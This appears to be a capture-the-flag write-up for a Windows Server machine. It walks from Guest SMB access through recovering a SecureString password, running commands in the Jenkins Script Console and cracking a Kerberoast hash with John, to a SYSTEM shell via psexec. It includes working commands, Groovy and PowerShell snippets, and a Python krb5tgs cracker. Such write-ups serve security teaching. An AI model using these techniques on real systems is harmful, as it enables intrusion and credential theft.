This machine was mostly about enumeration and privilege escalation: from an SMB share readable by the Guest account to NT AUTHORITY\SYSTEM.



The first step is to find out which ports are open, and Nmap does that for us.

→ nmap -sC -sV -oN scan -Pn

-sC  run the default NSE scripts
-sV  probe open ports to determine service and version information
-oN  save the output in Nmap's normal format (here to the file "scan")
-Pn  skip host discovery and treat the host as online

Nmap scan report for
Host is up (0.012s latency).
Not shown: 996 filtered ports
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: WORKGROUP)
8080/tcp open  http         Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: Host: WIN-V1LSDDMFJH2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h38m47s, deviation: 4h37m09s, median: -1m14s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: WIN-V1LSDDMFJH2
|   NetBIOS computer name: WIN-V1LSDDMFJH2\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-03T04:46:15-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-03T12:46:12
|_  start_date: 2020-01-31T10:09:47


Port 8080 serves Jetty, the servlet container Jenkins ships embedded in, and the service on it is indeed Jenkins. Jenkins is not vulnerable by itself: any account with administrator rights can run arbitrary Groovy on the controller through the Script Console, so valid credentials are what we need, and common defaults such as admin:admin do not work. That leaves SMB on port 445; the smb-security-mode output already shows Nmap got a session as guest, so we check what the Guest account can read.

→ smbmap -H -u Guest

[+] Finding open SMB ports....
[+] User SMB session established on
[+] IP:	Name:                                       
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	erik_stuff                                        	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	Users                                             	READ ONLY	


Guest has read access to erik_stuff and Users (besides IPC$), so erik is very likely a local account. erik_stuff is the more interesting share, so we list it recursively.

→ smbmap -H -u Guest -r erik_stuff

[+] Finding open SMB ports....
[+] User SMB session established on
[+] IP:	Name:                                       
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	erik_stuff                                        	READ ONLY	
	dr--r--r--                0 Mon Jan 13 16:58:16 2020	.
	dr--r--r--                0 Mon Jan 13 16:58:16 2020	..
	fr--r--r--              926 Mon Jan 13 16:58:16 2020	encrypted_password.txt
	fr--r--r--              523 Mon Jan 13 16:58:16 2020	script.ps1


Both files can be pulled with the --download parameter.

→ smbmap -H -u Guest --download 'erik_stuff\encrypted_password.txt'

[+] File output to: /home/arbenn/

→ smbmap -H -u Guest --download 'erik_stuff\script.ps1'

[+] File output to: /home/arbenn/  

→ cat encrypted_password.txt


→ cat script.ps1

# PS1 script to start jenkins as local user
# User and Password as cli argument
$username = "erik"
$erikpass = Get-Content "encrypted_password.txt" | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential($username,$erikpass)

# To Do
$srvName = "Jenkins"
$servicePrior = Get-Service $srvName
"$srvName is now " + $servicePrior.status
Set-Service $srvName -startuptype manual
Restart-Service $srvName
$serviceAfter = Get-Service $srvName
"$srvName is now " + $serviceAfter.status


script.ps1 restarts the Jenkins service using erik's credentials, and it builds those credentials from encrypted_password.txt with ConvertTo-SecureString. The weakness is that a SecureString only keeps the value out of plain sight in memory; anyone who can load that file into a SecureString can ask .NET for the plaintext back. One caveat for the general case: a string exported by Windows PowerShell with ConvertFrom-SecureString and no -Key is protected with DPAPI and normally unwraps only for the same user on the same machine, while one exported with -Key or -SecureKey unwraps anywhere the key is known. We already have the file, so we decrypt it in PowerShell.


# Same call script.ps1 makes, then marshal the plaintext out of the SecureString
$password = Get-Content "encrypted_password.txt" | ConvertTo-SecureString
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)   # wipe the unmanaged copy
$result



The plaintext is \4Eb]y. Paired with the username hardcoded in the script, erik, it logs us into Jenkins, and the account has administrator rights there.



We use Jenkins' built-in Script Console (Manage Jenkins > Script Console; it is part of core, not a plugin), which executes arbitrary Groovy on the controller in the security context of the account the Jenkins service runs as. Running "cmd /c whoami" there first tells you which account that is.


Enumerating erik's profile from the console turns up an old_stuff folder on his desktop, and it contains a file worth reading.

// List the folder. consumeProcessOutput returns immediately, so wait for the
// process to exit before printing or the buffer can still be empty.
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "cmd /c dir c:\\Users\\erik\\Desktop\\old_stuff".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitFor()
println "$sout"


// Print the hash file the same way
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "cmd /c type c:\\Users\\erik\\Desktop\\old_stuff\\administrator.hash".execute()
proc.consumeProcessOutput(sout, serr)
proc.waitFor()
println "$sout"



→ cat administrator.hash



This is a Kerberos 5 TGS-REP hash (etype 23, RC4-HMAC) in the format Impacket's GetUserSPNs.py writes, i.e. a Kerberoast artefact someone left behind. It cannot be decrypted outright, but it can be cracked offline: for each candidate password John derives the RC4-HMAC key (the MD4 of the UTF-16LE password, which is the NT hash), decrypts the ticket and checks the HMAC, so a weak service-account password falls to a wordlist. The result is then usable as the Administrator password.

→ john administrator.hash --wordlist=~/tools/SecLists/Passwords/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
No password hashes left to crack (see FAQ)                                              
1 password hash cracked, 0 left
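The following is an added illustration, not part of the original writeup and not John's code: it reproduces the per-candidate check John performs on an etype 23 krb5tgs line. The key is MD4 of the UTF-16LE password (the NT hash), K1 is HMAC-MD5 of that key over key usage 2 (the ticket's enc-part), the RC4 key K3 is HMAC-MD5(K1, checksum), and a guess is correct when the HMAC-MD5 of the decrypted body matches the checksum. That is one MD4, three HMAC-MD5s and one RC4 pass per guess, which is why Kerberoasting goes after RC4 tickets. MD4 is implemented inline because hashlib's md4 is often disabled under OpenSSL 3. The service account, realm, SPN, wordlist and EncTicketPart bytes are all constructed for the demo; the password it hides is the one the page cracks.

```python
"""Offline check of a krb5tgs (etype 23, RC4-HMAC) line, as john/hashcat do it per candidate."""
import hashlib
import hmac
import os
import re
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                r = (-i) % 4  # register updated this step: a, d, c, b, a, ...
                x, y, z = v[(r + 1) % 4], v[(r + 2) % 4], v[(r + 3) % 4]
                v[r] = _rotl((v[r] + fn(x, y, z) + X[k] + const) & MASK, shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_key(password: str) -> bytes:
    """RC4-HMAC long-term key = MD4(UTF-16LE(password)); identical to the NT hash."""
    return md4(password.encode("utf-16-le"))


KEY_USAGE_TGS_REP_TICKET = 2  # enc-part of the ticket inside a TGS-REP (RFC 4120 7.5.1)


def _k1(key: bytes) -> bytes:
    return hmac.new(key, struct.pack("<I", KEY_USAGE_TGS_REP_TICKET), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encrypt: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _k1(key)
    body = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(k1, body, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, body)


def rc4_hmac_verify(key: bytes, checksum: bytes, edata2: bytes) -> bool:
    """One cracker guess: derive K3 from the candidate key, decrypt, recompute the HMAC."""
    k1 = _k1(key)
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    body = rc4(k3, edata2)
    return hmac.compare_digest(hmac.new(k1, body, hashlib.md5).digest(), checksum)


HASH_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]*)\$([^$]*)\$([^*]*)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")


def format_krb5tgs(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """Line as GetUserSPNs.py writes it: 16-byte checksum, then the rest of the ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack_krb5tgs(line: str, wordlist):
    m = HASH_RE.match(line.strip())
    if not m:
        raise ValueError("not an etype-23 krb5tgs line")
    checksum, edata2 = bytes.fromhex(m.group(4)), bytes.fromhex(m.group(5))
    for candidate in wordlist:
        if rc4_hmac_verify(rc4_hmac_key(candidate), checksum, edata2):
            return candidate
    return None


# Constructed sample (hypothetical account, realm, SPN and ticket bytes) keyed with the page's password.
SAMPLE_TICKET_BODY = b"\x63\x82\x01\x0a" + b"A" * 60
SAMPLE_HASH = format_krb5tgs(
    "Administrator", "EXAMPLE.LOCAL", "MSSQLSvc/db.example.local:1433",
    rc4_hmac_encrypt(rc4_hmac_key("Ticketmaster1968"), SAMPLE_TICKET_BODY, b"\x00" * 8),
)
SAMPLE_WORDLIST = ["123456", "password", "admin", "Ticketmaster1968", "letmein"]

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack_krb5tgs(SAMPLE_HASH, SAMPLE_WORDLIST))
```

A real line from GetUserSPNs.py drops straight into crack_krb5tgs; rockyou-sized wordlists are of course the job of john or hashcat (mode 13100), but the check they run is exactly the one above.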

With the cracked password, Impacket's psexec.py gives us a SYSTEM shell: it uploads a service binary to ADMIN$ and starts it through the Service Control Manager, which is exactly what the output below shows.

→ python2 Administrator:'Ticketmaster1968'@

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file uZIDWCrQ.exe
[*] Opening SVCManager on
[*] Creating service sgda on
[*] Starting service sgda.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt.txt
XOR{6e1773e7187824ec9458dbb4dda3f4139f4e241a}

Machine created by:


  I hope you had fun solving this machine and learning something new.